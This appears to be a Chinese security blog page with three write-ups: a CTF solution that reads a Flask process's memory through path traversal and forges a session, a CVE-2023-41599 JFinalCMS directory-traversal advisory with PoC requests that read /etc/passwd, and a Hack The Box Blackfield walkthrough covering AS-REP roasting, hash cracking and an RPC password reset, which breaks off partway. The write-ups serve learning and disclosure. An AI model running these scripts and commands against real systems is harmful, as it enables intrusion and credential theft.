<p>然后发现,想要拿到路由我们必须伪造session_key,此处我们需要两个的值,一个是 key的值,一个是SECRET_KEY的值。那么我们该如何得到这两个值呢,config文件中也没有泄露。此时我们可以联想到之前2022蓝帽杯的一道web题,file_session,有一说一,这个是那题思路的一半部分。有兴趣的可以自己去看看。简单讲就是我们可以通过**/proc/self/maps<strong>获取内存分配,然后再根据内存分配信息在</strong>/proc/self/mem**进行内容的读取。此时我们就需要编写脚本来获取我们想要的内容</p>
<h2 id="0x02-获取KEY,SECRET-KEY"><a href="#0x02-获取KEY,SECRET-KEY" class="headerlink" title="0x02 获取KEY,SECRET_KEY"></a>0x02 获取KEY,SECRET_KEY</h2><p>此处主要需要根据key和SECRET_KEY的特征来筛选内容,但是由于两者都没有明显的特征导致在编写脚本的过程中最难的地方就是找寻特征最后终于找到了合适的特征来筛选处内容,粗糙的脚本如下,然后经过测试,大部分情况下都能直接且正确的找到目标,且大部分情况下,如果第一次运行没有找到,那么多运行几次便能找到目标。该脚本也是在一些大佬的获取内存数据的代码基础上进行了进一步的特征提取,获取目标值的内容。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests, re</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://127.0.0.1:8000/"</span></span><br><span class="line">maps_url = <span class="string">f"<span class="subst">{url}</span>/books?page_size=8000&book=.../.../.../.../.../.../proc/self/maps"</span></span><br><span class="line">maps_reg = <span class="string">"([a-z0-9]{12}-[a-z0-9]{12}) rw.*?00000000 00:00 0"</span></span><br><span class="line">maps = re.findall(maps_reg, requests.get(maps_url).text)</span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> maps:</span><br><span class="line"> start, end = m.split(<span class="string">"-"</span>)[<span class="number">0</span>], m.split(<span class="string">"-"</span>)[<span class="number">1</span>]</span><br><span class="line"> Offset, Length = <span class="built_in">str</span>(<span class="built_in">int</span>(start, <span class="number">16</span>)), <span class="built_in">str</span>(<span class="built_in">int</span>(end, <span class="number">16</span>) - <span class="built_in">int</span>(start, <span class="number">16</span>))</span><br><span class="line"> <span class="comment"># print(Offset,Length)</span></span><br><span class="line"> Offset = <span class="built_in">int</span>(Offset)</span><br><span class="line"> Length = <span class="built_in">int</span>(Length)</span><br><span class="line"> <span class="comment"># print(Offset)</span></span><br><span class="line"> read_url = <span class="string">f"<span class="subst">{url}</span>/books?page=<span class="subst">{<span class="built_in">int</span>((Offset/Length)+<span class="number">1</span>)}</span>&book=.../.../.../.../.../.../proc/self/mem&page_size=<span class="subst">{Length}</span>"</span></span><br><span class="line"> res = requests.get(read_url)</span><br><span class="line"> <span class="keyword">if</span>(res.status_code != <span class="number">200</span>):</span><br><span class="line"> read_url = <span class="string">f"<span class="subst">{url}</span>/books?page=<span class="subst">{<span class="built_in">int</span>((Offset/Length)+<span class="number">2</span>)}</span>&book=.../.../.../.../.../.../proc/self/mem&page_size=<span class="subst">{Length}</span>"</span></span><br><span class="line"> <span class="comment"># print(read_url)</span></span><br><span class="line"> res = requests.get(read_url)</span><br><span class="line"> <span class="keyword">if</span>(res.status_code != <span class="number">200</span>):</span><br><span class="line"> <span class="built_in">print</span>(Offset,<span class="string">"failed"</span>)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(Offset,<span class="string">"success"</span>)</span><br><span class="line"> <span class="keyword">if</span> res.content.find(<span class="string">b"\\xff\\xff\\xff\\xe4\\x00\\x87\\x01\\x97\\x00d\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"</span>) != -<span class="number">1</span> <span class="keyword">and</span> res.content.find(<span class="string">b"\\x00\\x02S\\x00\\x00\\x00"</span>) != -<span class="number">1</span>:</span><br><span class="line"> num = re.findall(<span class="string">"00[0-9a-f]{32}"</span>,res.text.replace(<span class="string">"\\x00"</span>,<span class="string">""</span>))</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">len</span>(num)!=<span class="number">0</span>):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> num:</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>运行结果如下:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170119.png" class="">
<p>如图所示,前者为SECRET_KEY,后者为key,去掉开头的00后就是对应的值。</p>
<h2 id="0x03-爆破key"><a href="#0x03-爆破key" class="headerlink" title="0x03 爆破key"></a>0x03 爆破key</h2><p>紧接着,我们就需要爆破key的值,此处我们需要根据session来获取一个时间戳来作为一个锚点,因为从代码中我们可以知道,session的生成的时间取决于我们何时访问**/books**路由,而key生成的时间取决于程序合适开始运行,所以我们需要以session的为起点,往前疯狂爆破,只能说,很crazy。因为本地环境下,我们可以通过快速访问生成session来减小两者的时间差,但是题目环境中就不会那么友好了。</p>
<p>session时间戳位置:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170139.png" class="">
<p>获取时间戳的值:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170035.png" class="">
<p>但由于此处是纳秒级的时间戳,所以,在此基础之上还需要往后面加9个0,然后再往前爆破。脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line">origin=<span class="number">1685436396000000000</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line"> <span class="keyword">if</span> hashlib.md5(<span class="built_in">str</span>(origin).encode()).hexdigest() == <span class="string">"34089e332229929cfc64344e3baf4f61"</span>:</span><br><span class="line"> <span class="built_in">print</span>(origin)</span><br><span class="line"> exit(<span class="number">0</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> origin=origin-<span class="number">1</span></span><br></pre></td></tr></table></figure>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170045.png" class="">
<p>本地可以直接单线程,但是根据情况我们应该需要编写多线程脚本来降低爆破的时间,或者利用其它工具来降低爆破时间提高成功率。</p>
<h2 id="0x04伪造session"><a href="#0x04伪造session" class="headerlink" title="0x04伪造session"></a>0x04伪造session</h2><p>这个应该都比较熟悉,flask伪造session,利用脚本<strong>flask_session_cookie_manager</strong>就好了,因为此处已经获得了key的原值和SECRET_KEY,所以可以直接伪造。</p>
<img src="/undefined/59bc99f5/image-20230530201950885.png" class="">
<p>最后就可以拿到flag了。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/68b58dca.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/68b58dca.html" class="post-title-link" itemprop="url">CVE-2023-41599</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-27 20:50:46" itemprop="dateCreated datePublished" datetime="2024-09-27T20:50:46+08:00">2024-09-27</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:01" itemprop="dateModified" datetime="2024-09-28T20:29:01+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="Directory-traversal-in-JFinalCMS"><a href="#Directory-traversal-in-JFinalCMS" class="headerlink" title="Directory traversal in JFinalCMS"></a>Directory traversal in JFinalCMS</h1><blockquote>
<p>source code: <a target="_blank" rel="noopener" href="https://gitee.com/heyewei/JFinalcms">https://gitee.com/heyewei/JFinalcms</a></p>
<p>Official website :<a target="_blank" rel="noopener" href="http://www.xiadaima.com/">http://www.xiadaima.com/</a></p>
</blockquote>
<h2 id="Analyze"><a href="#Analyze" class="headerlink" title="Analyze:"></a>Analyze:</h2><p>The vulnerable file is in <code>com/cms/controller/common/DownController.java</code></p>
<img src="/undefined/68b58dca/image-20230828144150045.png" class="">
<p>We can easily find that the file function concatenates the file name of the <code>fileKey</code> parameter as a string directly with the overall file path, without performing black and white list verification or security verification, which allows us to utilize Perform directory traversal</p>
<img src="/undefined/68b58dca/image-20230828144143097.png" class="">
<p>poc:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">I set a test.txt in E:\test.txt.And this java sysytem is also set in E-disk.</span><br><span class="line">Windows: /common/down/file?fileKey=/../../../../../../../../../test.txt</span><br><span class="line">Linux: /common/down/file?fileKey=/../../../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<img src="/undefined/68b58dca/image-20230828144727066.png" class="">
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/3db8feaa.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/3db8feaa.html" class="post-title-link" itemprop="url">Road-to-OSCP-7-Blackfield</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-05-09 23:51:50" itemprop="dateCreated datePublished" datetime="2023-05-09T23:51:50+08:00">2023-05-09</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:22" itemprop="dateModified" datetime="2024-09-28T20:29:22+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="HTB-Blackfiled-Walkthrough"><a href="#HTB-Blackfiled-Walkthrough" class="headerlink" title="HTB Blackfiled Walkthrough"></a>HTB Blackfiled Walkthrough</h1><h2 id="0x00-盒子简介"><a href="#0x00-盒子简介" class="headerlink" title="0x00 盒子简介"></a>0x00 盒子简介</h2><img src="/undefined/3db8feaa/Blackfield.png" class="">
<h2 id="0x01-思路简介"><a href="#0x01-思路简介" class="headerlink" title="0x01 思路简介"></a>0x01 思路简介</h2><p> 获得靶机后,我运用nmap进行服务端口信息收集,发现可以利用匿名用户登录共享文件夹profile$,但里面没有任何内容,但我们可以利用文件夹列表建立用户名列表,然后利用AS-REP roasting获得有效凭证,然后利用bloodhound发现改用户权限,从而利用RPC重置另一个账户的密码,然后利用该账户访问另一个共享文件,其中获得了lsass的内存转储,然后在本地利用pypykatz来转储它的哈希值。最后,使用winrm登录最新获取的用户,利用sebackupprivilege权限来备份ntds.dit,从而进一步获得所有账户的哈希转储。</p>
<h2 id="0x02-Recon"><a href="#0x02-Recon" class="headerlink" title="0x02 Recon"></a>0x02 Recon</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p>TCP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nmap --min-rate 10000 -p- -Pn -oN nmaptcp</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -p 53,88,135,445,3268,5985 -sC -sV -oN nmaptcp</span><br><span class="line">Nmap scan report for 10.10.10.192 </span><br><span class="line">Host is up (0.46s latency).</span><br><span class="line"> </span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS Plus</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-09 16:08:58Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-title: Not Found </span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results: </span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2023-05-09T16:09:19</span><br><span class="line">|_ start_date: N/A </span><br><span class="line">|_clock-skew: 6h59m59s </span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 311: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"># Nmap done at Tue May 9 17:10:00 2023 -- 1 IP address (1 host up) scanned in 72.69 seconds</span><br></pre></td></tr></table></figure>
<p>UDP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -sU --min-rate=1000 -p- -oN nmapudp 10.10.10.192</span><br><span class="line">Nmap scan report for 10.10.10.192</span><br><span class="line">Host is up (0.79s latency).</span><br><span class="line">Not shown: 65533 open|filtered udp ports (no-response)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">53/udp open domain</span><br><span class="line">389/udp open ldap</span><br></pre></td></tr></table></figure>
<h3 id="ldap"><a href="#ldap" class="headerlink" title="ldap"></a>ldap</h3><p>获得了<code>domain name</code>:BLACKFIELD.local</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts</span><br><span class="line"></span><br><span class="line">namingcontexts: DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local</span><br></pre></td></tr></table></figure>
<h3 id="smb"><a href="#smb" class="headerlink" title="smb"></a>smb</h3><p>发现可以匿名访问两个共享文件夹</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u null </span><br><span class="line">[+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic NO ACCESS Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON NO ACCESS Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL NO ACCESS Logon server share</span><br></pre></td></tr></table></figure>
<p>最后在<code>profiles$</code>找到了一些有效的内容,但是每个文件夹中都没有内容,但是关注到文件夹名称,我们可以收集文件夹名作为用户名列表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ smbclient -N \\\\10.10.10.192\\profiles$ </span><br><span class="line">Try "help" to get a list of possible commands. </span><br><span class="line">smb: \> ls </span><br><span class="line"> . D 0 Thu Jun 4 00:47:12 2020 </span><br><span class="line"> .. D 0 Thu Jun 4 00:47:12 2020 </span><br><span class="line"> AAlleni D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABarteski D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABekesz D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABenzies D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABiemiller D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AChampken D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ACheretei D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ACsonaki D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AHigchens D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AJaquemai D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AKlado D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKoffenburger D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKollolli D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKruppe D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKubale D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ALamerz D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AMaceldon D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AMasalunga D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANavay D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANesterova D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANeusse D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> <SNIP></span><br></pre></td></tr></table></figure>
<p>下载所有文件夹后,将所有文件名整理到文件中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smb: \> recurse on</span><br><span class="line">smb: \> prompt off</span><br><span class="line">smb: \> mget *</span><br><span class="line">smb: \></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ls -al|cut -d ':' -f2|tr ' ' ','|cut -d ',' -f2 > users</span><br></pre></td></tr></table></figure>
<h2 id="0x03-Access-as-support"><a href="#0x03-Access-as-support" class="headerlink" title="0x03 Access as support"></a>0x03 Access as support</h2><h3 id="userenum"><a href="#userenum" class="headerlink" title="userenum"></a>userenum</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ ./kerbrute_ userenum --dc 10.10.10.192 -d BLACKFIELD.LOCAL /home/sollupus/OSCP/Blackfield/Creds/users -t 50 </span><br><span class="line"></span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: v1.0.3 (9dad6e1) - 05/09/23 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2023/05/09 22:41:09 > Using KDC(s):</span><br><span class="line">2023/05/09 22:41:09 > 10.10.10.192:88</span><br><span class="line"></span><br><span class="line">2023/05/09 22:41:14 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:43 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:43 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:48 > Done! Tested 315 usernames (3 valid) in 39.649 seconds</span><br></pre></td></tr></table></figure>
<h3 id="AS-REP-roast"><a href="#AS-REP-roast" class="headerlink" title="AS-REP roast"></a>AS-REP roast</h3><p>获得有效用户名列表后,利用impacket里的<code>GetNPUsers</code>执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile vali_user -format hashcat -outputfile hashes.asp -dc-ip 10.10.10.192</span><br><span class="line"></span><br><span class="line">$ cat hashes.asp </span><br><span class="line">[email protected]:a3ed233fba253c99c06ebaf99736a3bc$e03c1b4d964a5d247b12222254efa9501b9d0be17bb089af9cd18bd7384c24619d153a0fd1d5f5981e3196c258c9a67c41a9a59ea0876bf8a3fd0e257c0c4147aa589fe5ef920f78e61f11b80dc61b87ba157aa01027433501dcd98e89c51b192fb2735adf5145cdcbbab27a0bb944acef1d0d5b2c0c782ddd8427843a6bf13f124ca8f68550eddddcb2686fdbbeb3c2d79b51f5f4991141242a79d2e7cb8157e833c8e04f401c0d2d927b40d334400e7ffcb63104c8ad735bfb4f5c1ca3ae1716bdf497ad15f52a1ba2d2776463711841493b0d5611bbc8906e1827bc32c38fa2e686bf38f695c7b0040583dcb1d7faf73a7e8a</span><br></pre></td></tr></table></figure>
<h3 id="Crack-Hash"><a href="#Crack-Hash" class="headerlink" title="Crack Hash"></a>Crack Hash</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ hashcat -m 18200 --force hashes.asp /usr/share/wordlists/rockyou.txt</span><br><span class="line"></span><br><span class="line"><SNIP></span><br><span class="line">[email protected]:a3ed233fba253c99c06ebaf99736a3bc$e03c1b4d964a5d247b12222254efa9501b9d0be17bb089af9cd18bd7384c24619d153a0fd1d5f5981e3196c258c9a67c41a9a59ea0876bf8a3fd0e257c0c4147aa589fe5ef920f78e61f11b80dc61b87ba157aa01027433501dcd98e89c51b192fb2735adf5145cdcbbab27a0bb944acef1d0d5b2c0c782ddd8427843a6bf13f124ca8f68550eddddcb2686fdbbeb3c2d79b51f5f4991141242a79d2e7cb8157e833c8e04f401c0d2d927b40d334400e7ffcb63104c8ad735bfb4f5c1ca3ae1716bdf497ad15f52a1ba2d2776463711841493b0d5611bbc8906e1827bc32c38fa2e686bf38f695c7b0040583dcb1d7faf73a7e8a:#00^BlackKnight</span><br><span class="line"><SNIP></span><br></pre></td></tr></table></figure>
<h3 id="Access-Check"><a href="#Access-Check" class="headerlink" title="Access Check"></a>Access Check</h3><p>smb->access</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'</span><br><span class="line"></span><br><span class="line">SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight:#00^BlackKnight</span><br></pre></td></tr></table></figure>
<p>winrm->failed</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'</span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight</span><br></pre></td></tr></table></figure>
<h2 id="0x04-support-gt-audit2020"><a href="#0x04-support-gt-audit2020" class="headerlink" title="0x04 support -> audit2020"></a>0x04 support -> audit2020</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight' </span><br><span class="line">[+] IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic NO ACCESS Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON READ ONLY Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL READ ONLY Logon server share</span><br></pre></td></tr></table></figure>
<p>遍历可进入的共享文件夹后,发现并没有什么可用信息。</p>
<h3 id="bloodhound"><a href="#bloodhound" class="headerlink" title="bloodhound"></a>bloodhound</h3><p>于是尝试用bloodhound进行域内权限关系</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 bloodhound.py -u support -p '#00^BlackKnight' -c All -ns 10.10.10.192 -d blackfield.local --zip</span><br></pre></td></tr></table></figure>
<p>将得到的zip包导入到Bloodhound中,然后找到了如下信息。</p>
<img src="/undefined/3db8feaa/image-20230509230203124.png" class="">
<p>这意味着,我们可以强制更改AUDIT2020账号的密码。</p>
<h3 id="Password-Reset-Over-Rpc"><a href="#Password-Reset-Over-Rpc" class="headerlink" title="Password Reset Over Rpc"></a>Password Reset Over Rpc</h3><blockquote>
<p><a target="_blank" rel="noopener" href="https://room362.com/post/2017/reset-ad-user-password-with-linux/">https://room362.com/post/2017/reset-ad-user-password-with-linux/</a></p>
</blockquote>
<p>我们可以用rpcclient登录,然后用<code>setuserinfo2</code>命令来更改账户密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ rpcclient -U support 10.10.10.192 </span><br><span class="line">Password for [WORKGROUP\support]:</span><br><span class="line">rpcclient $> setuserinfo2 audit2020 23 'Password@!!'</span><br></pre></td></tr></table></figure>
